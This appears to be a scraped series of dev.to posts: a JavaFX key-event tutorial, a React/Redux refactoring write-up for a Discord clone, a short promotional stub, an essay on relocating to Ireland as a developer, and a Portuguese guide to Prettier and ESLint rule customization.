Every key event has an associated code that is returned by the **getCode()** method in **KeyEvent**. The _key codes_ are constants defined in **KeyCode**. Table below lists some constants. **KeyCode** is an **enum** type. For the key-pressed and key-released events, **getCode()** returns the value as defined in the table, **getText()** returns a string that describes the key code, and **getCharacter()** returns an empty string. For the key-typed event, **getCode()** returns **UNDEFINED** and **getCharacter()** returns the Unicode character or a sequence of characters associated with the key-typed event.

The program below displays a user-input character. The user can move the character up, down, left, and right, using the up, down, left, and right arrow keys. Figure below contains a sample run of the program.

```
package application;
import javafx.application.Application;
import javafx.scene.Scene;
import javafx.scene.layout.Pane;
import javafx.scene.text.Text;
import javafx.stage.Stage;
public class KeyEventDemo extends Application {
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
// Create a pane and set its properties
Pane pane = new Pane();
Text text = new Text(20, 20, "A");
pane.getChildren().add(text);
text.setOnKeyPressed(e -> {
switch(e.getCode()) {
case DOWN: text.setY(text.getY() + 10); break;
case UP: text.setY(text.getY() - 10); break;
case LEFT: text.setX(text.getX() - 10); break;
case RIGHT: text.setX(text.getX() + 10); break;
default:
if(Character.isLetterOrDigit(e.getText().charAt(0)))
text.setText(e.getText());
}
});
// Create a scene and place it in the stage
Scene scene = new Scene(pane);
primaryStage.setTitle("KeyEventDemo"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
text.requestFocus(); // text is focused to receive key input
}
public static void main(String[] args) {
Application.launch(args);
}
}
```
The program creates a pane (line 12), creates a text (line 13), and places the text into the pane (line 15). The text registers the handler for the key-pressed event in lines 16–26. When a key is pressed, the handler is invoked. The program uses **e.getCode()** (line 17) to obtain the key code and **e.getText()** (line 24) to get the character for the key. When a nonarrow key is pressed, the character is displayed (lines 23 and 24). When an arrow key is pressed, the character moves in the direction indicated by the arrow key (lines 18–21). Note that in a switch statement for an enum type value, the cases are for the enum constants (lines 17–25). The constants are unqualified.
Only a focused node can receive **KeyEvent**. Invoking **requestFocus()** on **text** enables **text** to receive key input (line 34). This method must be invoked after the stage is displayed.
We can now add more control for our **ControlCircle.java** example in [this post](https://dev.to/paulike/registering-handlers-and-handling-events-3j7e) to increase/decrease the circle radius by clicking the left/right mouse button or by pressing the U and D keys. The new program is given in below.
```
package application;
import javafx.application.Application;
import javafx.geometry.Pos;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.input.KeyCode;
import javafx.scene.input.MouseButton;
import javafx.scene.layout.HBox;
import javafx.scene.layout.BorderPane;
import javafx.stage.Stage;
public class ControlCircleWithMouseAndKey extends Application {
private CirclePane circlePane = new CirclePane();
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
// Hold two buttons in an HBox
HBox hBox = new HBox();
hBox.setSpacing(10);
hBox.setAlignment(Pos.CENTER);
Button btEnlarge = new Button("Enlarge");
Button btShrink = new Button("Shrink");
hBox.getChildren().add(btEnlarge);
hBox.getChildren().add(btShrink);
// Create and register the handler
btEnlarge.setOnAction(e -> {
circlePane.enlarge();
circlePane.requestFocus(); // Request focus on circlePane
});
btShrink.setOnAction(e -> {
circlePane.shrink();
circlePane.requestFocus(); // Request focus on circlePane
});
circlePane.setOnMouseClicked(e -> {
if(e.getButton() == MouseButton.PRIMARY) {
circlePane.enlarge();
}
else if(e.getButton() == MouseButton.SECONDARY) {
circlePane.shrink();
}
circlePane.requestFocus(); // Request focus on circlePane
});
circlePane.setOnKeyPressed(e -> {
if(e.getCode() == KeyCode.U) {
circlePane.enlarge();
}
else if(e.getCode() == KeyCode.D) {
circlePane.shrink();
}
});
BorderPane borderPane = new BorderPane();
borderPane.setCenter(circlePane);
borderPane.setBottom(hBox);
BorderPane.setAlignment(hBox, Pos.CENTER);
// Create a scene and place it in the stage
Scene scene = new Scene(borderPane, 200, 150);
primaryStage.setTitle("KeyEventDemo"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
circlePane.requestFocus(); // Request focus on circlePane
}
public static void main(String[] args) {
Application.launch(args);
}
}
```
The **CirclePane** class (line 13) is already defined in ControlCircle.java and can be reused in this program.
A handler for mouse clicked events is created in lines 35–43. If the left mouse button is clicked, the circle is enlarged (lines 36–38); if the right mouse button is clicked, the circle is shrunk (lines 39–41).
A handler for key pressed events is created in lines 45–52. If the U key is pressed, the circle is enlarged (lines 46–48); if the D key is pressed, the circle is shrunk (lines 49–51).
Invoking **requestFocus()** on **circlePane** (line 65) makes **circlePane** to receive key events. Note that after you click a button, **circlePane** is no longer focused. To fix the problem, invoke **requestFocus()** on **circlePane** again after each button is clicked. | paulike |
1,899,364 | I refactored my Discord clone app to see if using Redux helps with state management, and here is what I found… | The Story Before I chose the tech stack for my Discord clone app, I didn't expect this... | 0 | 2024-06-24T21:12:15 | https://dev.to/anthonyzhang220/i-refactored-my-discord-clone-app-to-see-if-using-redux-helps-with-state-management-and-here-is-what-i-found-2ofl | discord, redux, react, learning | ## The Story
Before I chose the tech stack for my Discord clone app, I didn't expect this would be such a complex project so Redux was not part of the stack initially. The purpose of building this app, in the beginning, is I have been using Discord since 2017, and it is such a fun place to hang out with my friends, play games, chat, etc, so I want to replicate the experience. Later on, as I started to get a hang of modern web technologies, I became curious about what it takes to build Discord with the technologies I'm familiar with, for example, React.js.
## The Problem
It took me about 2 to 3 months to finish building the app with all the basic discord features ready for end users to use, such as direct messaging, group messaging, voice calling, friend invites, server and channel invites, group audio and video chat, and more. However, the code I wrote made me want to stop myself from even beginning this project because it is really hard to maintain and the code is barely readable. My wish is to keep this project alive and add more features later on, so I decided to refactor it no matter what.
## Evaluation before Refactoring
It is very obvious to me that my main App.js file is too bulky. It contains almost all states, functions, hooks, and so on with about 1000 lines of code. Even though the initial design of dividing each section to separate React components is quite nice, to be honest, there is still too much props drilling, which results in chaotic state management. Just to give you an idea of what my App.js looks like before refactoring.
---
Here is my <Channel/> react component with all the props passed to it,
```
<Route
index
element={
<Fragment>
<Channel
currentServer={currentServer}
setCurrentServer={setCurrentServer}
currentUser={currentUser}
currentChannel={currentChannel}
setCurrentUser={setCurrentUser}
signOut={signOut}
handleAddChannel={handleAddChannel}
handleCurrentChannel={handleCurrentChannel}
channelModal={channelModal}
setChannelModal={setChannelModal}
handleChannelInfo={handleChannelInfo}
newChannel={newChannel}
voiceChat={voiceChat}
setVoiceChat={setVoiceChat}
currentVoiceChannel={currentVoiceChannel}
setCurrentVoiceChannel={setCurrentVoiceChannel}
handleLocalUserLeftAgora={handleLocalUserLeftAgora}
muted={muted}
defen={defen}
handleDefen={handleDefen}
handleVideoMuted={handleVideoMuted}
handleVoiceMuted={handleVoiceMuted}
voiceConnected={voiceConnected}
isSharingEnabled={isSharingEnabled}
isMutedVideo={isMutedVideo}
screenShareToggle={screenShareToggle}
stats={stats}
connectionState={connectionState}
/>
{
voiceChat ?
<VoiceChat
voiceChat={voiceChat}
currentVoiceChannel={currentVoiceChannel}
config={config}
currentUser={currentUser}
isMutedVideo={isMutedVideo}
remoteUsers={remoteUsers}
setRemoteUsers={setRemoteUsers}
currentAgoraUID={currentAgoraUID}
/>
:
<Chat
currentUser={currentUser}
currentServer={currentServer}
currentChannel={currentChannel}
handleAddMessage={handleAddMessage}
handleChatInfo={handleChatInfo}
currentMessage={currentMessage}
/>
}
</Fragment>
}
/>
```
Here are the states and useEffect handling user authentications,
```
const navigate = useNavigate();
const GoogleProvider = new GoogleAuthProvider();
const FacebookProvider = new FacebookAuthProvider();
const TwitterProvider = new TwitterAuthProvider();
const GithubProvider = new GithubAuthProvider();
//show modal for new server/channel
const [channelModal, setChannelModal] = useState(false);
const [serverModal, setServerModal] = useState(false);
//add new server/channel
const [newChannel, setNewChannel] = useState("")
const [newServerInfo, setNewServerInfo] = useState({ name: "", serverPic: "" });
const [serverURL, setServerURL] = useState(null);
const [file, setFile] = useState(null);
//current Login USER/SERVER/CHANNEL
const [currentUser, setCurrentUser] = useState({ name: null, profileURL: null, uid: null, createdAt: null });
const [currentServer, setCurrentServer] = useState({ name: "", uid: null });
const [currentChannel, setCurrentChannel] = useState({ name: "", uid: null });
const [currentMessage, setCurrentMessage] = useState("");
const [imageDir, setImageDir] = useState("")
const [isLoading, setIsLoading] = useState(false);
const [friendList, setFriendList] = useState([])
//google sign in with redirect
const googleSignIn = () => {
signInWithRedirect(auth, GoogleProvider)
}
const facebookSignIn = () => {
signInWithRedirect(auth, FacebookProvider)
}
const twitterSignIn = () => {
signInWithRedirect(auth, TwitterProvider)
}
const githubSignIn = () => {
signInWithRedirect(auth, GithubProvider)
}
//auth/login state change
useEffect(() => {
const loginState = onAuthStateChanged(auth, (user) => {
console.log(user)
if (user) {
const userRef = doc(db, "users", user.uid);
getDoc(userRef).then((doc) => {
const has = doc.exists();
if (has) {
setCurrentUser({ name: doc.data().displayName, profileURL: doc.data().profileURL, uid: doc.data().userId, createdAt: doc.data().createdAt.seconds, status: doc.data().status })
} else {
setDoc(userRef, {
displayName: user.displayName,
email: user.email ? user.email : "",
profileURL: user.photoURL,
userId: user.uid,
createdAt: Timestamp.fromDate(new Date()),
status: "online",
friends: [],
}).then((doc) => {
setCurrentUser({ name: doc.data().displayName, profileURL: doc.data().profileURL, uid: doc.data().userId, createdAt: doc.data().createdAt.seconds, status: doc.data().status })
})
}
})
//if user not in the storage, add to the local storage
if (!localStorage.getItem(`${user.uid}`)) {
localStorage.setItem(`${user.uid}`, JSON.stringify({ defaultServer: "", defaultServerName: "", userDefault: [] }));
} else {
const storage = JSON.parse(localStorage.getItem(`${user.uid}`))
setCurrentServer({ name: storage.defaultServerName, uid: storage.defaultServer })
setCurrentChannel({ name: storage.userDefault.lengh == 0 ? "" : storage.userDefault.find(x => x.currentServer == storage.defaultServer).currentChannelName, uid: storage.userDefault.find(x => x.currentServer == storage.defaultServer).currentChannel })
}
navigate('/channels')
} else {
updateDoc(doc(db, "users", currentUser.uid), {
status: "offline",
})
setCurrentUser({ name: null, profileURL: null, uid: null, status: null })
navigate('/')
}
})
return () => {
loginState();
}
}, [auth])
//auth sign out function
const signOut = () => {
auth.signOut().then(() => {
const userRef = doc(db, "users", currentUser.uid)
updateDoc(userRef, {
status: "offline"
})
setCurrentUser({ name: null, profileURL: null, uid: null, createdAt: null })
}).then(() => {
navigate("/", { replace: true })
})
}
```
Here are some of the states and functions handling voice group chat using Agora SDK,
```
const [voiceChat, setVoiceChat] = useState(false);
const [currentVoiceChannel, setCurrentVoiceChannel] = useState({ name: null, uid: null })
const [config, setConfig] = useState(AgoraConfig)
const [isSharingEnabled, setIsSharingEnabled] = useState(false)
const [isMutedVideo, setIsMutedVideo] = useState(true)
const [agoraEngine, setAgoraEngine] = useState(AgoraClient);
const screenShareRef = useRef(null)
const [voiceConnected, setVoiceConnected] = useState(false);
const [remoteUsers, setRemoteUsers] = useState([]);
const [localTracks, setLocalTracks] = useState(null)
const [currentAgoraUID, setCurrentAgoraUID] = useState(null)
const [screenTrack, setScreenTrack] = useState(null);
const FetchToken = async () => {
return new Promise(function (resolve) {
if (config.channel) {
axios.get(config.serverUrl + '/rtc/' + config.channel + '/1/uid/' + "0" + '/?expiry=' + config.ExpireTime)
.then(
response => {
resolve(response.data.rtcToken);
})
.catch(error => {
console.log(error);
});
}
});
}
useEffect(() => {
setConfig({ ...config, channel: currentVoiceChannel.uid })
}, [currentVoiceChannel.uid])
const [connectionState, setConnectionState] = useState({ state: null, reason: null })
useEffect(() => {
agoraEngine.on("token-privilege-will-expire", async function () {
const token = await FetchToken();
setConfig({ ...config, token: token })
await agoraEngine.renewToken(config.token);
});
//enabled volume indicator
agoraEngine.enableAudioVolumeIndicator();
agoraEngine.on("volume-indicator", (volumes) => {
handleVolume(volumes)
})
agoraEngine.on("user-published", (user, mediaType) => {
console.log(user.uid + "published");
handleUserSubscribe(user, mediaType)
handleUserPublishedToAgora(user, mediaType)
});
agoraEngine.on("user-joined", (user) => {
handleRemoteUserJoinedAgora(user)
})
agoraEngine.on("user-left", (user) => {
console.log(user.uid + "has left the channel");
handleRemoteUserLeftAgora(user)
})
agoraEngine.on("user-unpublished", (user, mediaType) => {
console.log(user.uid + "unpublished");
handleUserUnpublishedFromAgora(user, mediaType)
});
agoraEngine.on("connection-state-change", (currentState, prevState, reason) => {
setConnectionState({ state: currentState, reason: reason })
})
return () => {
removeLiveUserFromFirebase(currentAgoraUID)
for (const localTrack of localTracks) {
localTrack.stop();
localTrack.close();
}
agoraEngine.off("user-published", handleRemoteUserJoinedAgora)
agoraEngine.off("user-left", handleRemoteUserLeftAgora)
agoraEngine.unpublish(localTracks).then(() => agoraEngine.leave())
}
}, []);
```
And this is only part of the code for my main App.js file. The reason I was putting all of them in here is because a lot of the state needs to be shared across child components, so I have to put it at the top of the DOM tree to be passed. ([If you want to take a look at my old App.js file, here it is for you.](https://github.com/AnthonyZhang220/discord_clone/blob/63e3c21f106d3863661f768a56926acb4ec11a40/src/App.js))
---
## Refactoring
The refactoring consists of a few steps. First, I need to divide them into different slices with different features, such as authentications, voice chat(Agora states), channel, server, message input, user, etc. Second, to further shrink the size of my App.js file, I need to group functions with similar purposes and put them into separate folders, for example, a util folder for all the utility functions, a handler/service folder for all the handlers such as user input handlers, voice chat room control handlers, server handlers, and more.
## The Result
Here is the shrunken-down version of my App.js file after refactoring. It serves as the project entry point and only deals with routing making the code clean.
```
function App() {
const dispatch = useDispatch()
const { user } = useSelector((state) => state.auth)
const { isVoiceChatPageOpen } = useSelector(state => state.voiceChat)
const { currVoiceChannel } = useSelector(state => state.channel)
const navigate = useNavigate();
useEffect(() => {
const unsubscribe = onAuthStateChanged(auth, async (user) => {
if (user) {
const userRef = doc(db, "users", user.uid);
const userDoc = await getDoc(userRef);
if (userDoc.exists()) {
const userData = userDoc.data();
console.log("userData", userData)
dispatch(setUser({ ...userData }))
} else {
const userDoc = await setDoc(userRef, {
displayName: user.displayName,
email: user.email ? user.email : "",
avatar: user.photoURL,
id: user.uid,
createdAt: Timestamp.fromDate(new Date()),
status: "online",
friends: [],
bannerColor: await getBannerColor(user.photoURL)
})
if (userDoc) {
dispatch(setUser(userDoc))
}
}
getSelectStore()
dispatch(setIsLoggedIn(true))
navigate("/channels")
} else {
dispatch(setUser(null))
dispatch(setIsLoggedIn(false))
navigate("/")
}
})
return unsubscribe;
}, [auth])
return (
<ThemeContextProvider>
<CssBaseline />
<Error />
<Routes>
<Route path="/" element={<LoginPage />} />
<Route path="/reset" element={<ResetPasswordPage />} />
<Route path="/register" element={<RegisterPage />} />
<Route element={
<Box className="app-mount">
<Box className="app-container" >
<Outlet />
</Box>
</Box>
} >
<Route path="/channels"
element={
<Fragment>
<ServerList />
<Outlet />
</Fragment>
}>
<Route index
element={
<Fragment>
<Channel />
{
isVoiceChatPageOpen ?
<VoiceChat currVoiceChannel={currVoiceChannel} />
:
<Chat />
}
</Fragment>
}
/>
<Route
path='/channels/@me'
element={
<Fragment>
<DirectMessageMenu />
<DirectMessageBody />
</Fragment>
} />
</Route>
</Route>
<Route path="*" element={<PageNotFound />} />
</Routes>
</ThemeContextProvider>
)
}
export default App;
```
Here is the Redux state graph. Almost all states are managed inside Redux.


**Does Redux help with state management?** For the obvious reason, yes it does. It makes my code way easier to read and maintain. Also with Redux, I can access the global state wherever I want. For example, both channel and voice chat components need to access the mic mute/unmute and camera on/off state, I can easily grab them in each child component.
---
## More Questions Ahead
As I was refactoring the code base, a question was raised in my head. Every time we fetch data from APIs, we tend to sync and store them inside Redux and reflect the data in our UI. This gives me the feeling that Redux serves almost the same role as the backend database, but works as a constantly changing database for the frontend part. It's like creating another database in the frontend part only for displaying data in the UI, which I think might be redundant because we already have a database, and we are communicating with it by APIs. Why do we need an extra layer? Why can't we just simply display the data as we received them from the backend?
After some reading and research, it turns out we have created many solutions to my question. In the MVC model, we have a model, view, and controller system, where views are directed by controllers to represent the models. Many frontend technologies use this MVC model like Ruby on Rails and Django. Recently, HTMX has gained more popularity among backend developers because it is server-centric. When a new piece of data is received, it is immediately updated on the website, while keeping it interactive. [Here is a link to the video from DjangoCon 2022 where a HTMX demo is being presented by David Guillot.](https://www.youtube.com/watch?v=3GObi93tjZI)
There are certainly more solutions. But Redux for sure plays an essential role in the React ecosystem. It is extremely useful when we are building large and complex web applications where we need state management across the project. But on the downside, it creates more boilerplate code, in my Discord clone as well. This is like creating another abstraction on top of React, which is an abstraction itself, but we kind of stuck to using it. I would also think that Redux is a more front-end approach to how we handle data, especially in SPA. As modern web technologies evolve and develop, we will see more ideas and solutions. With the latest React v18 and 19 with RSC, we will start to see more things done in the server component on the server side. This to me feels like a trend, and I find it very interesting that the front end is trying to move closer to the back end, and the back end is trying to move closer to the front end with new techs like HTMX. I'm excited to see what is coming for modern web development in the near future.
---
If you would like to check out my whole Discord clone project, here is the [GitHub link](https://github.com/AnthonyZhang220/discord_clone) to my repository. If you like my project, please don't hesitate to leave a star.

 | anthonyzhang220 |
1,899,211 | Bear Brothers Cleaning | Bear Brothers Cleaning | 0 | 2024-06-24T18:19:51 | https://dev.to/bear_brotherscleaning_a3/bear-brothers-cleaning-3od6 | [Bear Brothers Cleaning](https://bearbroscleaning.com/) | bear_brotherscleaning_a3 | |
1,899,363 | Moving Abroad: My Journey as a Frontend Developer in a New Country | In the next few lines, I will share my personal experience of moving from Barcelona to Dublin while... | 0 | 2024-06-24T21:10:20 | https://dev.to/adriangube/my-experience-moving-to-another-country-as-a-developer-3895 | webdev, frontend, career, careerdevelopment | In the next few lines, I will share my personal experience of moving from Barcelona to Dublin while working as a developer. It has been a very interesting experience with more than a few challenges, and finally, almost 2 years later, I’m ready to share my experience.
Everything started as all big changes do, with a mix of excitement, fear, and a lot of planning. It was a very planned decision, as my wife and I had spent countless hours talking about leaving Spain to try a different country. We knew that our future country needed to be in Europe, as none of us wanted to be too far from our family, and we knew that we wanted to live in a country where their main language was English. That left only two potential options: the UK and Ireland.

Before Brexit, we both liked the idea of moving to Scotland, as we’ve been there on vacation a few times, and we really liked the lifestyle and people, and my wife was especially in love with Edinburgh. However, Brexit changed everything. As you may know, after Brexit, you need to get a visa to stay in the UK. Besides, the COVID situation was pretty recent (it was 2022), so we felt like trying to move to the UK was too risky for us. The only option left was Ireland.
I knew that Ireland had the headquarters of the biggest tech companies in the world, such as Google, Amazon, Apple, Microsoft, and many more, so for me, Ireland was an option that really excited me from a career point of view. There was only one tiny problem. I had never visited the country, and apart from knowing that it could be good for my career, I had no idea about it. My wife, on the contrary, had visited Ireland on one occasion, and she really liked the lifestyle and the culture, as it’s relatively similar to Scotland, with green landmarks, a lot of castles and monuments, and a lot of nature around, which is something that we both value a lot.
After investigating the country from very different points of view (economics, politics, culture, history, cost of living, salaries, work market, etc.), I found it pretty appealing, especially since we were living in Spain, which was facing economic problems, and the work market was pretty slow with a huge unemployment rate (it still has one of the higher unemployment rates in Europe).
Ireland was not perfect, though. After some investigation, I found that Ireland was facing a severe housing crisis, and the cost of living has been skyrocketing since the start of the war in Ukraine. I was not scared, though, as Spain was facing the same issues, and to be fair, I think most of the problems that I found online were the same in most parts of Europe.
So, once the decision about the country was made, there was a tiny, small detail to solve. We only wanted to move to Ireland once I found a job while still living in Spain, as we thought it would be too risky to leave our stable jobs in Spain to live in a different country without having a job or having any contact that could help us in case things didn’t go as planned as they usually do.
## Looking for a job in Ireland from Spain
First of all, I would like to share a little bit about my background. In 2022, I had a little more than 5 years of experience, and I was working in Spain for an online travel agency called Atrapalo as a senior frontend developer, working with technologies such as Next.js, React, and Typescript and following clean architectures such as domain-driven design. In summary, I like to think that I have a really good CV, as I’ve always tried to work for companies that make me grow in my career and offer me opportunities to learn the latest technologies.

With that in mind, I started translating all my LinkedIn and CVs from Spanish to English, and I started applying to different job positions.
I also started speaking in English with my wife daily to practice, as I was not 100% fluent, especially when speaking. By then, my English was good enough to read (a few months prior to making the final decision to move, I started reading books only in English), and I was able to understand 80% of a conversation, but when I tried to speak, I felt really awkward, and I got extremely nervous. After a month of speaking daily and exclusively in English with my wife, I improved enough to feel relatively comfortable having phone interviews without choking.
After a month of sending CV’s and having some phone interviews with recruiters, I reached the final stage with 2 companies. I got an offer from one of them, which I decided to accept. The offer was good enough, but in the lower range for someone with my skillset. And there was no relocation package and no fancy perks. However, for me, the most important part was the opportunity that this job offered me. We were moving to Ireland.
## Preparing to move to Ireland
When I received the offer, I told the company that I needed six weeks to be ready. Two of these weeks were to finish the relationship with my current employer (as it’s common in Spain), two weeks to make the proper arrangements to move, and 2 weeks to establish ourselves in Ireland.

This seems like enough time, but there was so much that needed to be done. First of all, we tried to sell all the things that were worth selling. We gifted or threw away the rest. We also got our passports in place (it’s not really needed because we were moving inside Europe, but it’s always a good idea to have the passports ready just in case). We also started looking for temporary accommodation in Ireland, as it was impossible to rent anything while living in Spain due to the housing crisis and the fact that we had a Spanish phone number, and for some reason, maybe because of the high demand, no landlord was willing to call us back, so we finally ended up renting for 3 weeks an apartment in the centre of Dublin, as my position was fully remote within Ireland and we wanted to be close to the public transport, and it’s always easy to move around if you’re in a city.
The last few days, apart from doing the usual preparations, we decided to spend as much time as possible with family and friends, and in no time it was the night prior to our flight to Ireland.
## The first few weeks in Ireland
As soon as we reached the Dublin airport, my wife and I had one and only one obsession: to find long-term accommodation in Dublin. We did our investigation online, and it was really hard to find any place to rent in the city, and we only had the booking for 3 weeks, so the clock was ticking.
We got some prepaid Irish phone numbers, and we started applying to every accommodation that was published on several online portals. We had notifications active, and every time we got one, we stopped doing whatever we were doing at the moment to send an application.
The only two requisites that were non-negotiable for us were that it needed to have two rooms (one to sleep in and another so I could work), and we didn’t want to share the place with other people. It was one of the most stressful moments of my life.

During these few days, we also tried to open a bank account in Ireland because it’s always easy to do some paperwork if you have a local bank account, and also because my new employer asked me for a bank account with an Irish IBAN. However, for some reason, it was impossible to open a bank account without permanent residency. There was some workaround that we tried with an online bank account (nowadays Revolut offers an Irish IBAN), but in the end it didn’t work for us, and my employer offered me to use Wise instead of a conventional bank.
After a week in Dublin, we had the opportunity to visit a few apartments, but we were not selected by the landlords, or it was not what we were expecting from the place. It’s impressive what some state agents can do with nice lighting and Photoshop.
We were pretty anxious by then, but some evening we received a call from the state agent that managed the first house that we went to see in Dublin (a nice and small 2-bed terrace house from the 70’s) saying that the landlady was offering to rent the house to us. It was quite expensive, in the upper bracket of our budget, but we decided to accept it as it had been hell to find anything that fit our expectations and was in living conditions.
A week later, still living in the temporary apartment, I started my new position as a senior frontend developer, and two weeks later we moved to our new home.
## Working as a developer in a different country
As I mentioned before, I worked fully remotely in my new position. This was not new for me because, even before the pandemic, I used to work hybrid, going to the office only 2 days per week, and after the pandemic, I had plenty of time to get used to working from home most of the time.
One of the biggest differences that I discovered about my colleagues is that everyone is really polite with each other. It's not that in Spain people are rude or anything like that, but Spanish as a language is more direct, and it’s common to use commanding sentences. In Ireland, however, people are more polite and use more indirect ways of asking for things. That’s something that I eventually got used to, but in the beginning, it took me some time to start talking this way.

Another difference that I noticed was that people respect the working hours, and except on exceptional occasions, I was never asked to work overtime. On the contrary, in Spain, it is pretty common to work as a developer for nine or even ten hours per day, depending on the company. And no, in case you’re asking yourself about it, nobody pays you for the overtime hours.
Other than that, the kind of job and the project that I worked on were pretty similar to my previous experiences. The main difference was that in Ireland we had less stress in general and the timing was more realistic, but that could perfectly be because I got lucky with the companies that I’ve been working for so far.
## Being in emergency tax and getting the PPSN
Something to consider when moving to Ireland is that to be able to pay taxes, you need to have a PPS number. And when you first arrive in the country, you obviously don’t have one. You cannot require one without employment and permanent residency in Ireland.
If you don’t have this number, you will be subject to the emergency tax. This basically means they are going to tax all your salary at 40%, which is the maximum rate. There is no way to prevent this from happening, so in the first few months that it takes to request the PPS number, you will only get a little more than half of your salary. After that, you can request to get your money back, and I must say that the revenue is really fast, giving you back what is yours.
## Weather
Some people imagine Ireland as this grey country, always rainy and windy. And they are not wrong; there is some truth in that. It rains a lot, but I must say that we don’t experience heavy rain too frequently; most of the time, it is very light rain. To be honest, I really like the humid days when there is a very subtle rain outside and I’m working, warm, and cosy at home. The summer is mild, and the days are longer and way sunnier, which I really appreciate compared to Spain, where the summer is like living in hell at 35 degrees Celsius.

However, during winter we don’t have much sunlight, and I take vitamin D supplements as I used to be a little bit low on morale, which never happened to me before living in Spain.
In general, I like the weather here, but it’s a very personal thing, and I know that there are a lot of people, especially those living in warm countries, who find it really difficult to live in Ireland because of the weather.
## Final Thoughts
Almost two years later, we are still living in the same 2-bed terrace house. I’m working for a different employer for almost double my initial salary in Ireland, and we are about to buy a house in the country. So much has happened since then, but everything started with the desire to improve in life and not be complacent in our comfort zone. I have not regretted it even once.
| adriangube |
1,896,495 | Regras customizáveis para Prettier + Eslint em React | Introdução No artigo do mês passado apresentei o setup de Eslint com Prettier para... | 0 | 2024-06-24T21:07:36 | https://dev.to/griseduardo/regras-customizaveis-para-prettier-eslint-em-react-306c | react, eslint, prettier, webdev | ## Introdução
No [artigo](https://dev.to/griseduardo/setup-eslint-prettier-para-padronizacao-de-codigo-em-react-4029) do mês passado apresentei o setup de Eslint com Prettier para aplicação React, com foco em usar as libs como ferramentas de padronização de código e antecipação de erros. Nesse artigo vou apresentar como fazer a customização das regras e apresentar algumas interessantes a se analisar, mas não sugerindo o uso ou não delas, dado que isso é relativo ao projeto e a definição do time envolvido no desenvolvimento dele.
## Regras
Relembrando a definição usada no artigo passado, dentro do arquivo de configuração do eslint `.eslintrc.json`, definimos para usar as regras recomendadas do eslint, react, react-hooks e usar o prettier em conjunto:
```js
{
//...
"extends": [
"eslint:recommended",
"plugin:react/recommended",
"plugin:react-hooks/recommended",
"prettier"
],
"rules": {
"prettier/prettier": ["error"]
}
}
```
Caso o código não esteja de acordo com as regras provenientes dessa configuração, é retornado erro na execução do eslint.
## Customização Prettier
Para customizar as regras, no arquivo do `.eslintrc.json` segue-se a seguinte estrutura:
```js
{
//...
"rules": {
"prettier/prettier": [
"tipo_de_erro",
{
//...
regra: expectativa_de_regra,
regra: expectativa_de_regra
}
]
}
}
```
Em `tipo_de_erro` podem ser definidos dois tipos:
- warn: retorna um aviso se as regras não forem satisfeitas
- error: retorna erro se as regra não forem satisfeitas
Em `regra` é definida a regra que vai ser customizada e em `expectativa_de_regra` o que é esperado que seja satisfeito no código.
## Regras Prettier
| Regra | Default | Tipo |
| :---: | :-----: | :--: |
| singleQuote | false | boolean |
| tabWidth | 2 | número |
| printWidth | 80 | número |
| jsxSingleQuote | false | boolean |
| arrowParens | "always" | "always" ou "avoid"
`singleQuote`: define se o projeto vai usar aspas simples, sem considerar jsx (por default está definido como false, ou seja, para usar aspas duplas)
`tabWidth`: define o espaço na indentação
`printWidth`: define o tamanho de linha desejável
`jsxSingleQuote`: define se vai usar aspas simples para jsx (por default está definido como false, ou seja, para usar aspas duplas)
`arrowParens`: define se inclui parenteses para arrow function com um parâmetro (por default definido sempre)
- "always": `(x) => x`
- "avoid": `x => x`
Para mostrar como é feita a customização, segue um exemplo de definição no `.eslintrc.json`:
```js
{
//...
"rules": {
"prettier/prettier": [
"error",
{
//...
"singleQuote": true,
"jsxSingleQuote": true,
"arrowParens": "avoid"
}
]
}
}
```
## Customização Eslint
Para customizar as regras, no arquivo do `.eslintrc.json` segue-se a seguinte estrutura:
```js
{
//...
"rules": {
//...
regra: tipo_de_erro,
regra: [tipo_de_erro, expectativa_de_regra]
}
}
```
Em `tipo_de_erro` podem ser definidos três tipos:
- warn: retorna um aviso se a regra não for satisfeita
- error: retorna erro se a regra não for satisfeita
- off: desabilita a regra
Para o eslint, há duas formas de definição de regras. Para a que só se faz a ativação ou desabilitação, segue-se a estrutura: `regra: tipo_de_erro`. Para regra que corresponde a definição de valor ou algo que não se resume somente a ativar ela, segue-se a estrutura: `regra: [tipo_de_erro, expectativa_de_regra]`, onde em `expectativa_de_regra` é definido o que é esperado que seja satisfeito no código.
## Regras Eslint
| Procedência | Regra | Default |
| :---------: | :---: | :-----: |
| eslint | no-duplicated-imports | desabilitada |
| eslint | no-console | desabilitada |
| eslint | no-nested-ternary | desabilitada |
| eslint | eqeqeq | desabilitada |
| plugin react | react/jsx-uses-react | ativa |
| plugin react | react/react-in-jsx-scope | ativa |
| plugin react | react/jsx-no-useless-fragment | desabilitada |
| plugin react | react/no-array-index-key | desabilitada |
| plugin react | react/destructuring-assignment | desabilitada |
| plugin react-hooks | react-hooks/rules-of-hooks | ativa |
| plugin react-hooks | react-hooks/exhaustive-deps | ativa |
`no-duplicated-imports`: não permite duplicação de chamada de imports provenientes de um mesmo caminho relativo
`no-console`: não permite console.log()
`no-nested-ternary`: não permite nested ternários
`eqeqeq`: define para comparação somente `===` ou `!==`
`react/jsx-uses-react` e `react/react-in-jsx-scope`: define a necessidade de realizar o `import React`, mas para aplicações de React 17+ que não necessitam desse import é interessante desabilitar essas regras
`react/jsx-no-useless-fragment`: não permite fragmentos desnecessários
`react/no-array-index-key`: não permite como chave de array o index
`react/destructuring-assignment`: define o uso de destructuring para props, state e context
`react-hooks/rules-of-hooks`: define o uso das regras de hooks, que inclui por exemplo não colocar hook dentro de condicional (dentre outras que vou colocar o link no final do artigo)
`react-hooks/exhaustive-deps`: define a necessidade de colocar todas as dependências dentro dos hooks
Para mostrar como é feita a customização, segue um exemplo de definição no `.eslintrc.json`:
```js
{
//...
"rules": {
//...
"no-console": "warn",
"eqeqeq": "error",
"react/destructuring-assignement": "error",
"react/no-array-index-key": "error",
"react-hooks/exhaustive-deps": "warn"
}
}
```
## Conclusão
